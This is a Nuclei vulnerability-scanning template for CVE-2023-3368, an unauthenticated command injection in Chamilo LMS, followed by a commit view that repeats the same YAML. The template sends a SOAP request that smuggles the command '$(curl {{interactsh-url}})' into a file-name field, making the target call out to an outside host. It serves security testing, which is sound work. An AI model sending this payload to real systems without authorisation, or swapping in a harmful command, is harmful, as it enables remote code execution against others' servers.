nuclei-templates/http/cves/2023/CVE-2023-3368.yaml

id: CVE-2023-3368

info:
  name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
  author: dwisiswant0
  severity: critical
  description: |
    Command injection in `/main/webservices/additional_webservices.php`
    in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain
    remote code execution via improper neutralisation of special characters.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3368
    - https://starlabs.sg/advisories/23/23-3368/
    - https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
  tags: cve,cve2023,chamilo,unauth,cmd,rce

http:
  - method: POST
    path:
      - "{{BaseURL}}/main/webservices/additional_webservices.php"
    headers:
      Content-Type: application/xml
    body: |
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <SOAP-ENV:Body>
          <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
              <item>
                <key xsi:type="xsd:string">file_data</key>
                <value xsi:type="xsd:string"></value>
              </item>
              <item>
                <key xsi:type="xsd:string">file_name</key>
                <value xsi:type="xsd:string">$(curl {{interactsh-url}})</value>
              </item>
              <item>
                <key xsi:type="xsd:string">service_ppt2lp_size</key>
                <value xsi:type="xsd:string">720x540</value>
              </item>
            </param0>
          </ns1:wsConvertPpt>
        </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "wsConvertPptResponse"
        part: body

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
feat: add CVE-2023-3368 Chamilo LMS <= v1.11.20 Unauthenticated Command Injection Signed-off-by: Dwi Siswanto <me@dw1.io> 2023-11-29 21:34:56 +00:00			`id: CVE-2023-3368`

			`info:`
			`name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection`
			`author: dwisiswant0`
			`severity: critical`
			`description: \|`
			Command injection in `/main/webservices/additional_webservices.php`
			`in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain`
			`remote code execution via improper neutralisation of special characters.`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-3368`
			`- https://starlabs.sg/advisories/23/23-3368/`
			`- https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368`
			`tags: cve,cve2023,chamilo,unauth,cmd,rce`

			`http:`
			`- method: POST`
			`path:`
			`- "{{BaseURL}}/main/webservices/additional_webservices.php"`
			`headers:`
			`Content-Type: application/xml`
			`body: \|`
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">`
			`<SOAP-ENV:Body>`
			`<ns1:wsConvertPpt>`
			`<param0 xsi:type="ns2:Map">`
			`<item>`
			`<key xsi:type="xsd:string">file_data</key>`
			`<value xsi:type="xsd:string"></value>`
			`</item>`
			`<item>`
			`<key xsi:type="xsd:string">file_name</key>`
			`<value xsi:type="xsd:string">$(curl {{interactsh-url}})</value>`
			`</item>`
			`<item>`
			`<key xsi:type="xsd:string">service_ppt2lp_size</key>`
			`<value xsi:type="xsd:string">720x540</value>`
			`</item>`
			`</param0>`
			`</ns1:wsConvertPpt>`
			`</SOAP-ENV:Body>`
			`</SOAP-ENV:Envelope>`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`words:`
			`- "wsConvertPptResponse"`
			`part: body`

			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "http"`